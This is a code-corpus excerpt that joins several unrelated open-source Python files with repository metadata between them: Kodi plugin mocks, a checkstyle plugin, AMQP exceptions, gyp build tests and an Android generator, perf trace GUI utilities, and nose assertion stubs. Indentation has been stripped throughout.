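# lets chained calls on attributes that are missing from the mock modules
# succeed instead of raising, e.g.
#   xbmcgui = module(mock_xbmcgui)                        # hypothetical wrapped mock
#   xbmcgui.SomeMissingClass().some_missing_call('demo')  # logs warnings, returns the wrapper
# Attributes that do exist on the wrapped module are passed through unchanged.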
try:
import xbmc
import xbmcgui
import xbmcplugin
import xbmcaddon
import xbmcvfs
CLI_MODE = False
except ImportError:
CLI_MODE = True
import sys
from logger import log
# Mock the XBMC modules
from mockxbmc import xbmc, xbmcgui, xbmcplugin, xbmcaddon, xbmcvfs
xbmc = module(xbmc)
xbmcgui = module(xbmcgui)
xbmcplugin = module(xbmcplugin)
xbmcaddon = module(xbmcaddon)
xbmcvfs = module(xbmcvfs)
from xbmcswift2.storage import TimedStorage
from xbmcswift2.request import Request
from xbmcswift2.common import (xbmc_url, enum, clean_dict, pickle_dict,
unpickle_args, unpickle_dict, download_page, unhex)
from xbmcswift2.constants import SortMethod, VIEW_MODES
from xbmcswift2.listitem import ListItem
from xbmcswift2.logger import setup_log
from xbmcswift2.module import Module
from xbmcswift2.urls import AmbiguousUrlException, NotFoundException, UrlRule
from xbmcswift2.xbmcmixin import XBMCMixin
from xbmcswift2.plugin import Plugin
|
gpl-3.0
|
jsirois/commons
|
src/python/twitter/checkstyle/plugins/missing_contextmanager.py
|
14
|
1726
|
# ==================================================================================================
# Copyright 2014 Twitter, Inc.
# --------------------------------------------------------------------------------------------------
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this work except in compliance with the License.
# You may obtain a copy of the License in the LICENSE file, or at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==================================================================================================
# TODO(wickman)
#
# 1. open(foo) should always be done in a with context.
#
# 2. if you see acquire/release on the same variable in a particular ast
# body, warn about context manager use.
import ast
from ..common import CheckstylePlugin
class MissingContextManager(CheckstylePlugin):
"""Recommend the use of contextmanagers when it seems appropriate."""
def nits(self):
with_contexts = set(self.iter_ast_types(ast.With))
with_context_calls = set(node.context_expr for node in with_contexts
if isinstance(node.context_expr, ast.Call))
for call in self.iter_ast_types(ast.Call):
if isinstance(call.func, ast.Name) and call.func.id == 'open' and (
call not in with_context_calls):
yield self.warning('T802', 'open() calls should be made within a contextmanager.', call)
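# Illustrative examples of what this plugin reports (assumed, not from the
# original source):
#   fp = open('foo.txt')             # open() outside a with-block -> T802 warning
#   with open('foo.txt') as fp:      # open() used as a context manager -> no nit
#       data = fp.read()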
|
apache-2.0
|
eandersson/amqp-storm
|
amqpstorm/exception.py
|
2
|
4462
|
"""AMQPStorm Exception."""
AMQP_ERROR_MAPPING = {
311: ('CONTENT-TOO-LARGE',
'The client attempted to transfer content larger than the '
'server could accept at the present time. The client may '
'retry at a later time.'),
312: ('NO-ROUTE', 'Undocumented AMQP Soft Error'),
313: ('NO-CONSUMERS',
'When the exchange cannot deliver to a consumer when the '
'immediate flag is set. As a result of pending data on '
'the queue or the absence of any consumers of the queue.'),
320: ('CONNECTION-FORCED',
'An operator intervened to close the connection for some reason. '
'The client may retry at some later date.'),
402: ('INVALID-PATH',
'The client tried to work with an unknown virtual host.'),
403: ('ACCESS-REFUSED',
'The client attempted to work with a server entity to which '
'has no access due to security settings.'),
404: ('NOT-FOUND',
'The client attempted to work with a server '
'entity that does not exist.'),
405: ('RESOURCE-LOCKED',
'The client attempted to work with a server entity to which it '
'has no access because another client is working with it.'),
406: ('PRECONDITION-FAILED',
'The client requested a method that was not '
'allowed because some precondition failed.'),
501: ('FRAME-ERROR',
'The sender sent a malformed frame that the recipient could '
'not decode. This strongly implies a programming error in '
'the sending peer.'),
502: ('SYNTAX-ERROR',
'The sender sent a frame that contained illegal values for '
'one or more fields. This strongly implies a programming '
'error in the sending peer.'),
503: ('COMMAND-INVALID',
'The client sent an invalid sequence of frames, attempting to '
'perform an operation that was considered invalid by the server. '
'This usually implies a programming error in the client.'),
504: ('CHANNEL-ERROR',
'The client attempted to work with a channel that had not '
'been correctly opened. This most likely indicates a '
'fault in the client layer.'),
505: ('UNEXPECTED-FRAME',
'The peer sent a frame that was not expected, usually in the '
'context of a content header and body. This strongly '
'indicates a fault in the peer\'s content processing.'),
506: ('RESOURCE-ERROR',
'The server could not complete the method because it lacked '
'sufficient resources. This may be due to the client '
'creating too many of some type of entity.'),
530: ('NOT-ALLOWED',
'The client tried to work with some entity in a manner '
'that is prohibited by the server, due to security '
'settings or by some other criteria.'),
540: ('NOT-IMPLEMENTED',
'The client tried to use functionality that is '
'not implemented in the server.'),
541: ('INTERNAL-ERROR',
'The server could not complete the method because of an '
'internal error. The server may require intervention by '
'an operator in order to resume normal operations.')
}
class AMQPError(IOError):
"""General AMQP Error"""
_documentation = None
_error_code = None
_error_type = None
@property
def documentation(self):
"""AMQP Documentation string."""
return self._documentation or bytes()
@property
def error_code(self):
"""AMQP Error Code - A 3-digit reply code."""
return self._error_code
@property
def error_type(self):
"""AMQP Error Type e.g. NOT-FOUND."""
return self._error_type
def __init__(self, *args, **kwargs):
self._error_code = kwargs.pop('reply_code', None)
super(AMQPError, self).__init__(*args, **kwargs)
if self._error_code not in AMQP_ERROR_MAPPING:
return
self._error_type = AMQP_ERROR_MAPPING[self._error_code][0]
self._documentation = AMQP_ERROR_MAPPING[self._error_code][1]
class AMQPConnectionError(AMQPError):
"""AMQP Connection Error"""
pass
class AMQPChannelError(AMQPError):
"""AMQP Channel Error"""
pass
class AMQPMessageError(AMQPChannelError):
"""AMQP Message Error"""
pass
class AMQPInvalidArgument(AMQPError):
"""AMQP Argument Error"""
|
mit
|
kawalpemilu/kawalpemilu2014
|
internal-backend/http-server/gyp/test/mac/gyptest-app.py
|
75
|
4193
|
#!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Verifies that app bundles are built correctly.
"""
import TestGyp
import os
import plistlib
import subprocess
import sys
def GetStdout(cmdlist):
return subprocess.Popen(cmdlist,
stdout=subprocess.PIPE).communicate()[0].rstrip('\n')
def ExpectEq(expected, actual):
if expected != actual:
print >>sys.stderr, 'Expected "%s", got "%s"' % (expected, actual)
test.fail_test()
def ls(path):
'''Returns a list of all files in a directory, relative to the directory.'''
result = []
for dirpath, _, files in os.walk(path):
for f in files:
result.append(os.path.join(dirpath, f)[len(path) + 1:])
return result
def XcodeVersion():
stdout = subprocess.check_output(['xcodebuild', '-version'])
version = stdout.splitlines()[0].split()[-1].replace('.', '')
return (version + '0' * (3 - len(version))).zfill(4)
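# For example (illustrative): Xcode 5.0 reports '5.0', which becomes '50' after
# stripping the dot, is right-padded with zeros to '500' and zero-filled to '0500'.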
if sys.platform == 'darwin':
test = TestGyp.TestGyp(formats=['ninja', 'make', 'xcode'])
test.run_gyp('test.gyp', chdir='app-bundle')
test.build('test.gyp', test.ALL, chdir='app-bundle')
# Binary
test.built_file_must_exist('Test App Gyp.app/Contents/MacOS/Test App Gyp',
chdir='app-bundle')
# Info.plist
info_plist = test.built_file_path('Test App Gyp.app/Contents/Info.plist',
chdir='app-bundle')
test.must_exist(info_plist)
test.must_contain(info_plist, 'com.google.Test-App-Gyp') # Variable expansion
test.must_not_contain(info_plist, '${MACOSX_DEPLOYMENT_TARGET}');
if test.format != 'make':
# TODO: Synthesized plist entries aren't hooked up in the make generator.
plist = plistlib.readPlist(info_plist)
ExpectEq(GetStdout(['sw_vers', '-buildVersion']),
plist['BuildMachineOSBuild'])
# Prior to Xcode 5.0.0, SDKROOT (and thus DTSDKName) was only defined if
# set in the Xcode project file. Starting with that version, it is always
# defined.
expected = ''
if XcodeVersion() >= '0500':
version = GetStdout(['xcodebuild', '-version', '-sdk', '', 'SDKVersion'])
expected = 'macosx' + version
ExpectEq(expected, plist['DTSDKName'])
sdkbuild = GetStdout(
['xcodebuild', '-version', '-sdk', '', 'ProductBuildVersion'])
if not sdkbuild:
# Above command doesn't work in Xcode 4.2.
sdkbuild = plist['BuildMachineOSBuild']
ExpectEq(sdkbuild, plist['DTSDKBuild'])
xcode, build = GetStdout(['xcodebuild', '-version']).splitlines()
xcode = xcode.split()[-1].replace('.', '')
xcode = (xcode + '0' * (3 - len(xcode))).zfill(4)
build = build.split()[-1]
ExpectEq(xcode, plist['DTXcode'])
ExpectEq(build, plist['DTXcodeBuild'])
# Resources
strings_files = ['InfoPlist.strings', 'utf-16be.strings', 'utf-16le.strings']
for f in strings_files:
strings = test.built_file_path(
os.path.join('Test App Gyp.app/Contents/Resources/English.lproj', f),
chdir='app-bundle')
test.must_exist(strings)
# Xcode writes UTF-16LE with BOM.
contents = open(strings, 'rb').read()
if not contents.startswith('\xff\xfe' + '/* Localized'.encode('utf-16le')):
test.fail_test()
test.built_file_must_exist(
'Test App Gyp.app/Contents/Resources/English.lproj/MainMenu.nib',
chdir='app-bundle')
# Packaging
test.built_file_must_exist('Test App Gyp.app/Contents/PkgInfo',
chdir='app-bundle')
test.built_file_must_match('Test App Gyp.app/Contents/PkgInfo', 'APPLause',
chdir='app-bundle')
# Check that no other files get added to the bundle.
if set(ls(test.built_file_path('Test App Gyp.app', chdir='app-bundle'))) != \
set(['Contents/MacOS/Test App Gyp',
'Contents/Info.plist',
'Contents/Resources/English.lproj/MainMenu.nib',
'Contents/PkgInfo',
] +
[os.path.join('Contents/Resources/English.lproj', f)
for f in strings_files]):
test.fail_test()
test.pass_test()
|
agpl-3.0
|
hyperNURb/ggrc-core
|
src/ggrc_workflows/services/workflow_cycle_calculator/annually_cycle_calculator.py
|
5
|
2706
|
# Copyright (C) 2015 Google Inc., authors, and contributors <see AUTHORS file>
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
# Created By: [email protected]
# Maintained By: [email protected]
import datetime
from dateutil import relativedelta
from cycle_calculator import CycleCalculator
class AnnuallyCycleCalculator(CycleCalculator):
"""CycleCalculator implementation for annual workflows.
Month domain is 1-12, date domain is 1-31.
"""
time_delta = relativedelta.relativedelta(years=1)
date_domain = {1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18,
19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31}
month_domain = {1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12}
def __init__(self, workflow, base_date=None):
super(AnnuallyCycleCalculator, self).__init__(workflow)
base_date = self.get_base_date(base_date)
self.reified_tasks = {}
for task in self.tasks:
start_date, end_date = self.non_adjusted_task_date_range(
task, base_date, initialisation=True)
self.reified_tasks[task.id] = {
'start_date': start_date,
'end_date': end_date,
'relative_start': (task.relative_start_month, task.relative_start_day),
'relative_end': (task.relative_end_month, task.relative_end_day)
}
def relative_day_to_date(self, relative_day, relative_month=None,
base_date=None):
"""Converts an annual relative day representation to concrete date object
First we ensure that we have both relative_day and relative_month or,
alternatively, that relative_day carries month information as well.
While task_date_range calls with explicit relative_month, reified_tasks
stores relative days as MM/DD and we must first convert these values so
that it can sort and get min and max values for tasks.
Afterwards we repeat the math similar to monthly cycle calculator and
ensure that the day is not overflowing to the next month.
"""
today = datetime.date.today()
relative_day = int(relative_day)
relative_month = int(relative_month)
if not relative_day in AnnuallyCycleCalculator.date_domain:
raise ValueError
if not relative_month in AnnuallyCycleCalculator.month_domain:
raise ValueError
base_date = self.get_base_date(base_date)
start_month = datetime.date(base_date.year, relative_month, 1)
ddate = start_month + relativedelta.relativedelta(days=relative_day - 1)
# We want to go up to the end of the month and not over
if ddate.month != start_month.month:
ddate = ddate - relativedelta.relativedelta(days=ddate.day)
return ddate
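# Worked example (illustrative): with base_date = 2015-06-15, relative_month=2 and
# relative_day=30 give start_month = 2015-02-01 and ddate = 2015-03-02 before
# clamping; the month overflowed, so ddate.day (2) days are subtracted and the
# method returns 2015-02-28.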
|
apache-2.0
|
MoKee/android_kernel_amazon_otter-common
|
tools/perf/scripts/python/Perf-Trace-Util/lib/Perf/Trace/SchedGui.py
|
12980
|
5411
|
# SchedGui.py - Python extension for perf script, basic GUI code for
# traces drawing and overview.
#
# Copyright (C) 2010 by Frederic Weisbecker <[email protected]>
#
# This software is distributed under the terms of the GNU General
# Public License ("GPL") version 2 as published by the Free Software
# Foundation.
try:
import wx
except ImportError:
raise ImportError, "You need to install the wxpython lib for this script"
class RootFrame(wx.Frame):
Y_OFFSET = 100
RECT_HEIGHT = 100
RECT_SPACE = 50
EVENT_MARKING_WIDTH = 5
def __init__(self, sched_tracer, title, parent = None, id = -1):
wx.Frame.__init__(self, parent, id, title)
(self.screen_width, self.screen_height) = wx.GetDisplaySize()
self.screen_width -= 10
self.screen_height -= 10
self.zoom = 0.5
self.scroll_scale = 20
self.sched_tracer = sched_tracer
self.sched_tracer.set_root_win(self)
(self.ts_start, self.ts_end) = sched_tracer.interval()
self.update_width_virtual()
self.nr_rects = sched_tracer.nr_rectangles() + 1
self.height_virtual = RootFrame.Y_OFFSET + (self.nr_rects * (RootFrame.RECT_HEIGHT + RootFrame.RECT_SPACE))
# whole window panel
self.panel = wx.Panel(self, size=(self.screen_width, self.screen_height))
# scrollable container
self.scroll = wx.ScrolledWindow(self.panel)
self.scroll.SetScrollbars(self.scroll_scale, self.scroll_scale, self.width_virtual / self.scroll_scale, self.height_virtual / self.scroll_scale)
self.scroll.EnableScrolling(True, True)
self.scroll.SetFocus()
# scrollable drawing area
self.scroll_panel = wx.Panel(self.scroll, size=(self.screen_width - 15, self.screen_height / 2))
self.scroll_panel.Bind(wx.EVT_PAINT, self.on_paint)
self.scroll_panel.Bind(wx.EVT_KEY_DOWN, self.on_key_press)
self.scroll_panel.Bind(wx.EVT_LEFT_DOWN, self.on_mouse_down)
self.scroll.Bind(wx.EVT_PAINT, self.on_paint)
self.scroll.Bind(wx.EVT_KEY_DOWN, self.on_key_press)
self.scroll.Bind(wx.EVT_LEFT_DOWN, self.on_mouse_down)
self.scroll.Fit()
self.Fit()
self.scroll_panel.SetDimensions(-1, -1, self.width_virtual, self.height_virtual, wx.SIZE_USE_EXISTING)
self.txt = None
self.Show(True)
def us_to_px(self, val):
return val / (10 ** 3) * self.zoom
def px_to_us(self, val):
return (val / self.zoom) * (10 ** 3)
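# Example (illustrative): with self.zoom == 0.5, us_to_px(4000) == 2.0 and
# px_to_us(2.0) == 4000.0, so the two conversions invert each other.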
def scroll_start(self):
(x, y) = self.scroll.GetViewStart()
return (x * self.scroll_scale, y * self.scroll_scale)
def scroll_start_us(self):
(x, y) = self.scroll_start()
return self.px_to_us(x)
def paint_rectangle_zone(self, nr, color, top_color, start, end):
offset_px = self.us_to_px(start - self.ts_start)
width_px = self.us_to_px(end - self.ts_start)
offset_py = RootFrame.Y_OFFSET + (nr * (RootFrame.RECT_HEIGHT + RootFrame.RECT_SPACE))
width_py = RootFrame.RECT_HEIGHT
dc = self.dc
if top_color is not None:
(r, g, b) = top_color
top_color = wx.Colour(r, g, b)
brush = wx.Brush(top_color, wx.SOLID)
dc.SetBrush(brush)
dc.DrawRectangle(offset_px, offset_py, width_px, RootFrame.EVENT_MARKING_WIDTH)
width_py -= RootFrame.EVENT_MARKING_WIDTH
offset_py += RootFrame.EVENT_MARKING_WIDTH
(r ,g, b) = color
color = wx.Colour(r, g, b)
brush = wx.Brush(color, wx.SOLID)
dc.SetBrush(brush)
dc.DrawRectangle(offset_px, offset_py, width_px, width_py)
def update_rectangles(self, dc, start, end):
start += self.ts_start
end += self.ts_start
self.sched_tracer.fill_zone(start, end)
def on_paint(self, event):
dc = wx.PaintDC(self.scroll_panel)
self.dc = dc
width = min(self.width_virtual, self.screen_width)
(x, y) = self.scroll_start()
start = self.px_to_us(x)
end = self.px_to_us(x + width)
self.update_rectangles(dc, start, end)
def rect_from_ypixel(self, y):
y -= RootFrame.Y_OFFSET
rect = y / (RootFrame.RECT_HEIGHT + RootFrame.RECT_SPACE)
height = y % (RootFrame.RECT_HEIGHT + RootFrame.RECT_SPACE)
if rect < 0 or rect > self.nr_rects - 1 or height > RootFrame.RECT_HEIGHT:
return -1
return rect
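# Worked example (illustrative): with Y_OFFSET=100, RECT_HEIGHT=100 and
# RECT_SPACE=50, a click at y=260 gives y - Y_OFFSET = 160, rect index
# 160 / 150 = 1 and height 160 % 150 = 10, which lies inside the rectangle,
# so 1 is returned.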
def update_summary(self, txt):
if self.txt:
self.txt.Destroy()
self.txt = wx.StaticText(self.panel, -1, txt, (0, (self.screen_height / 2) + 50))
def on_mouse_down(self, event):
(x, y) = event.GetPositionTuple()
rect = self.rect_from_ypixel(y)
if rect == -1:
return
t = self.px_to_us(x) + self.ts_start
self.sched_tracer.mouse_down(rect, t)
def update_width_virtual(self):
self.width_virtual = self.us_to_px(self.ts_end - self.ts_start)
def __zoom(self, x):
self.update_width_virtual()
(xpos, ypos) = self.scroll.GetViewStart()
xpos = self.us_to_px(x) / self.scroll_scale
self.scroll.SetScrollbars(self.scroll_scale, self.scroll_scale, self.width_virtual / self.scroll_scale, self.height_virtual / self.scroll_scale, xpos, ypos)
self.Refresh()
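# Clarifying note (added): __zoom recomputes the virtual width for the new zoom
# factor and repositions the scrollbars so that the timestamp 'x' that sat at the
# left edge before zooming stays at the left edge afterwards.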
def zoom_in(self):
x = self.scroll_start_us()
self.zoom *= 2
self.__zoom(x)
def zoom_out(self):
x = self.scroll_start_us()
self.zoom /= 2
self.__zoom(x)
def on_key_press(self, event):
key = event.GetRawKeyCode()
if key == ord("+"):
self.zoom_in()
return
if key == ord("-"):
self.zoom_out()
return
key = event.GetKeyCode()
(x, y) = self.scroll.GetViewStart()
if key == wx.WXK_RIGHT:
self.scroll.Scroll(x + 1, y)
elif key == wx.WXK_LEFT:
self.scroll.Scroll(x - 1, y)
elif key == wx.WXK_DOWN:
self.scroll.Scroll(x, y + 1)
elif key == wx.WXK_UP:
self.scroll.Scroll(x, y - 1)
|
gpl-2.0
|
goodwinnk/intellij-community
|
python/helpers/python-skeletons/nose/tools/__init__.py
|
80
|
5457
|
"""Skeleton for 'nose.tools' module.
Project: nose 1.3 <https://nose.readthedocs.org/>
Skeleton by: Andrey Vlasovskikh <[email protected]>
"""
import sys
def assert_equal(first, second, msg=None):
"""Fail if the two objects are unequal as determined by the '==' operator.
"""
pass
def assert_not_equal(first, second, msg=None):
"""Fail if the two objects are equal as determined by the '==' operator.
"""
pass
def assert_true(expr, msg=None):
"""Check that the expression is true."""
pass
def assert_false(expr, msg=None):
"""Check that the expression is false."""
pass
if sys.version_info >= (2, 7):
def assert_is(expr1, expr2, msg=None):
"""Just like assert_true(a is b), but with a nicer default message."""
pass
def assert_is_not(expr1, expr2, msg=None):
"""Just like assert_true(a is not b), but with a nicer default message.
"""
pass
def assert_is_none(obj, msg=None):
"""Same as assert_true(obj is None), with a nicer default message.
"""
pass
def assert_is_not_none(obj, msg=None):
"""Included for symmetry with assert_is_none."""
pass
def assert_in(member, container, msg=None):
"""Just like assert_true(a in b), but with a nicer default message."""
pass
def assert_not_in(member, container, msg=None):
"""Just like assert_true(a not in b), but with a nicer default message.
"""
pass
def assert_is_instance(obj, cls, msg=None):
"""Same as assert_true(isinstance(obj, cls)), with a nicer default
message.
"""
pass
def assert_not_is_instance(obj, cls, msg=None):
"""Included for symmetry with assert_is_instance."""
pass
def assert_raises(excClass, callableObj=None, *args, **kwargs):
"""Fail unless an exception of class excClass is thrown by callableObj when
invoked with arguments args and keyword arguments kwargs.
If called with callableObj omitted or None, will return a
context object used like this::
with assert_raises(SomeException):
do_something()
:rtype: unittest.case._AssertRaisesContext | None
"""
pass
if sys.version_info >= (2, 7):
def assert_raises_regexp(expected_exception, expected_regexp,
callable_obj=None, *args, **kwargs):
"""Asserts that the message in a raised exception matches a regexp.
:rtype: unittest.case._AssertRaisesContext | None
"""
pass
def assert_almost_equal(first, second, places=None, msg=None, delta=None):
"""Fail if the two objects are unequal as determined by their difference
rounded to the given number of decimal places (default 7) and comparing to
zero, or by comparing that the difference between the two objects is more than the
given delta.
"""
pass
def assert_not_almost_equal(first, second, places=None, msg=None, delta=None):
"""Fail if the two objects are equal as determined by their difference
rounded to the given number of decimal places (default 7) and comparing to
zero, or by comparing that the difference between the two objects is less than the
given delta.
"""
pass
if sys.version_info >= (2, 7):
def assert_greater(a, b, msg=None):
"""Just like assert_true(a > b), but with a nicer default message."""
pass
def assert_greater_equal(a, b, msg=None):
"""Just like assert_true(a >= b), but with a nicer default message."""
pass
def assert_less(a, b, msg=None):
"""Just like assert_true(a < b), but with a nicer default message."""
pass
def assert_less_equal(a, b, msg=None):
"""Just like self.assertTrue(a <= b), but with a nicer default
message.
"""
pass
def assert_regexp_matches(text, expected_regexp, msg=None):
"""Fail the test unless the text matches the regular expression."""
pass
def assert_not_regexp_matches(text, unexpected_regexp, msg=None):
"""Fail the test if the text matches the regular expression."""
pass
def assert_items_equal(expected_seq, actual_seq, msg=None):
"""An unordered sequence specific comparison. It asserts that
actual_seq and expected_seq have the same element counts.
"""
pass
def assert_dict_contains_subset(expected, actual, msg=None):
"""Checks whether actual is a superset of expected."""
pass
def assert_multi_line_equal(first, second, msg=None):
"""Assert that two multi-line strings are equal."""
pass
def assert_sequence_equal(seq1, seq2, msg=None, seq_type=None):
"""An equality assertion for ordered sequences (like lists and tuples).
"""
pass
def assert_list_equal(list1, list2, msg=None):
"""A list-specific equality assertion."""
pass
def assert_tuple_equal(tuple1, tuple2, msg=None):
"""A tuple-specific equality assertion."""
pass
def assert_set_equal(set1, set2, msg=None):
"""A set-specific equality assertion."""
pass
def assert_dict_equal(d1, d2, msg=None):
"""A dict-specific equality assertion."""
pass
assert_equals = assert_equal
assert_not_equals = assert_not_equal
assert_almost_equals = assert_almost_equal
assert_not_almost_equals = assert_not_almost_equal
|
apache-2.0
|
Jason-Lam/linux-am335x
|
tools/perf/scripts/python/Perf-Trace-Util/lib/Perf/Trace/Util.py
|
12527
|
1935
|
# Util.py - Python extension for perf script, miscellaneous utility code
#
# Copyright (C) 2010 by Tom Zanussi <[email protected]>
#
# This software may be distributed under the terms of the GNU General
# Public License ("GPL") version 2 as published by the Free Software
# Foundation.
import errno, os
FUTEX_WAIT = 0
FUTEX_WAKE = 1
FUTEX_PRIVATE_FLAG = 128
FUTEX_CLOCK_REALTIME = 256
FUTEX_CMD_MASK = ~(FUTEX_PRIVATE_FLAG | FUTEX_CLOCK_REALTIME)
NSECS_PER_SEC = 1000000000
def avg(total, n):
return total / n
def nsecs(secs, nsecs):
return secs * NSECS_PER_SEC + nsecs
def nsecs_secs(nsecs):
return nsecs / NSECS_PER_SEC
def nsecs_nsecs(nsecs):
return nsecs % NSECS_PER_SEC
def nsecs_str(nsecs):
str = "%5u.%09u" % (nsecs_secs(nsecs), nsecs_nsecs(nsecs)),
return str
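# Example (illustrative): nsecs(2, 5) == 2000000005, which nsecs_str() formats
# as "    2.000000005".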
def add_stats(dict, key, value):
if not dict.has_key(key):
dict[key] = (value, value, value, 1)
else:
min, max, avg, count = dict[key]
if value < min:
min = value
if value > max:
max = value
avg = (avg + value) / 2
dict[key] = (min, max, avg, count + 1)
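# Note (added for clarity): the 'avg' slot above is updated as (avg + value) / 2,
# a running midpoint that weights recent samples more heavily than a true mean.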
def clear_term():
print("\x1b[H\x1b[2J")
audit_package_warned = False
try:
import audit
machine_to_id = {
'x86_64': audit.MACH_86_64,
'alpha' : audit.MACH_ALPHA,
'ia64' : audit.MACH_IA64,
'ppc' : audit.MACH_PPC,
'ppc64' : audit.MACH_PPC64,
's390' : audit.MACH_S390,
's390x' : audit.MACH_S390X,
'i386' : audit.MACH_X86,
'i586' : audit.MACH_X86,
'i686' : audit.MACH_X86,
}
try:
machine_to_id['armeb'] = audit.MACH_ARMEB
except:
pass
machine_id = machine_to_id[os.uname()[4]]
except:
if not audit_package_warned:
audit_package_warned = True
print "Install the audit-libs-python package to get syscall names"
def syscall_name(id):
try:
return audit.audit_syscall_to_name(id, machine_id)
except:
return str(id)
def strerror(nr):
try:
return errno.errorcode[abs(nr)]
except:
return "Unknown %d errno" % nr
|
gpl-2.0
|
rabipanda/tensorflow
|
tensorflow/python/training/training_ops.py
|
131
|
1046
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Python wrappers for training ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.training import gen_training_ops
# go/tf-wildcard-import
# pylint: disable=wildcard-import
from tensorflow.python.training.gen_training_ops import *
# pylint: enable=wildcard-import
|
apache-2.0
|
tacrow/tacrow
|
node_modules/node-gyp/gyp/pylib/gyp/generator/android.py
|
960
|
45344
|
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
# Notes:
#
# This generates makefiles suitable for inclusion into the Android build system
# via an Android.mk file. It is based on make.py, the standard makefile
# generator.
#
# The code below generates a separate .mk file for each target, but
# all are sourced by the top-level GypAndroid.mk. This means that all
# variables in .mk-files clobber one another, and furthermore that any
# variables set potentially clash with other Android build system variables.
# Try to avoid setting global variables where possible.
import gyp
import gyp.common
import gyp.generator.make as make # Reuse global functions from make backend.
import os
import re
import subprocess
generator_default_variables = {
'OS': 'android',
'EXECUTABLE_PREFIX': '',
'EXECUTABLE_SUFFIX': '',
'STATIC_LIB_PREFIX': 'lib',
'SHARED_LIB_PREFIX': 'lib',
'STATIC_LIB_SUFFIX': '.a',
'SHARED_LIB_SUFFIX': '.so',
'INTERMEDIATE_DIR': '$(gyp_intermediate_dir)',
'SHARED_INTERMEDIATE_DIR': '$(gyp_shared_intermediate_dir)',
'PRODUCT_DIR': '$(gyp_shared_intermediate_dir)',
'SHARED_LIB_DIR': '$(builddir)/lib.$(TOOLSET)',
'LIB_DIR': '$(obj).$(TOOLSET)',
'RULE_INPUT_ROOT': '%(INPUT_ROOT)s', # This gets expanded by Python.
'RULE_INPUT_DIRNAME': '%(INPUT_DIRNAME)s', # This gets expanded by Python.
'RULE_INPUT_PATH': '$(RULE_SOURCES)',
'RULE_INPUT_EXT': '$(suffix $<)',
'RULE_INPUT_NAME': '$(notdir $<)',
'CONFIGURATION_NAME': '$(GYP_CONFIGURATION)',
}
# Make supports multiple toolsets
generator_supports_multiple_toolsets = True
# Generator-specific gyp specs.
generator_additional_non_configuration_keys = [
# Boolean to declare that this target does not want its name mangled.
'android_unmangled_name',
# Map of android build system variables to set.
'aosp_build_settings',
]
generator_additional_path_sections = []
generator_extra_sources_for_rules = []
ALL_MODULES_FOOTER = """\
# "gyp_all_modules" is a concatenation of the "gyp_all_modules" targets from
# all the included sub-makefiles. This is just here to clarify.
gyp_all_modules:
"""
header = """\
# This file is generated by gyp; do not edit.
"""
# Map gyp target types to Android module classes.
MODULE_CLASSES = {
'static_library': 'STATIC_LIBRARIES',
'shared_library': 'SHARED_LIBRARIES',
'executable': 'EXECUTABLES',
}
def IsCPPExtension(ext):
return make.COMPILABLE_EXTENSIONS.get(ext) == 'cxx'
def Sourceify(path):
"""Convert a path to its source directory form. The Android backend does not
support options.generator_output, so this function is a noop."""
return path
# Map from qualified target to path to output.
# For Android, the target of these maps is a tuple ('static', 'modulename'),
# ('dynamic', 'modulename'), or ('path', 'some/path') instead of a string,
# since we link by module.
target_outputs = {}
# Map from qualified target to any linkable output. A subset
# of target_outputs. E.g. when mybinary depends on liba, we want to
# include liba in the linker line; when otherbinary depends on
# mybinary, we just want to build mybinary first.
target_link_deps = {}
class AndroidMkWriter(object):
"""AndroidMkWriter packages up the writing of one target-specific Android.mk.
Its only real entry point is Write(), and is mostly used for namespacing.
"""
def __init__(self, android_top_dir):
self.android_top_dir = android_top_dir
def Write(self, qualified_target, relative_target, base_path, output_filename,
spec, configs, part_of_all, write_alias_target, sdk_version):
"""The main entry point: writes a .mk file for a single target.
Arguments:
qualified_target: target we're generating
relative_target: qualified target name relative to the root
base_path: path relative to source root we're building in, used to resolve
target-relative paths
output_filename: output .mk file name to write
spec, configs: gyp info
part_of_all: flag indicating this target is part of 'all'
write_alias_target: flag indicating whether to create short aliases for
this target
sdk_version: what to emit for LOCAL_SDK_VERSION in output
"""
gyp.common.EnsureDirExists(output_filename)
self.fp = open(output_filename, 'w')
self.fp.write(header)
self.qualified_target = qualified_target
self.relative_target = relative_target
self.path = base_path
self.target = spec['target_name']
self.type = spec['type']
self.toolset = spec['toolset']
deps, link_deps = self.ComputeDeps(spec)
# Some of the generation below can add extra output, sources, or
# link dependencies. All of the out params of the functions that
# follow use names like extra_foo.
extra_outputs = []
extra_sources = []
self.android_class = MODULE_CLASSES.get(self.type, 'GYP')
self.android_module = self.ComputeAndroidModule(spec)
(self.android_stem, self.android_suffix) = self.ComputeOutputParts(spec)
self.output = self.output_binary = self.ComputeOutput(spec)
# Standard header.
self.WriteLn('include $(CLEAR_VARS)\n')
# Module class and name.
self.WriteLn('LOCAL_MODULE_CLASS := ' + self.android_class)
self.WriteLn('LOCAL_MODULE := ' + self.android_module)
# Only emit LOCAL_MODULE_STEM if it's different to LOCAL_MODULE.
# The library module classes fail if the stem is set. ComputeOutputParts
# makes sure that stem == modulename in these cases.
if self.android_stem != self.android_module:
self.WriteLn('LOCAL_MODULE_STEM := ' + self.android_stem)
self.WriteLn('LOCAL_MODULE_SUFFIX := ' + self.android_suffix)
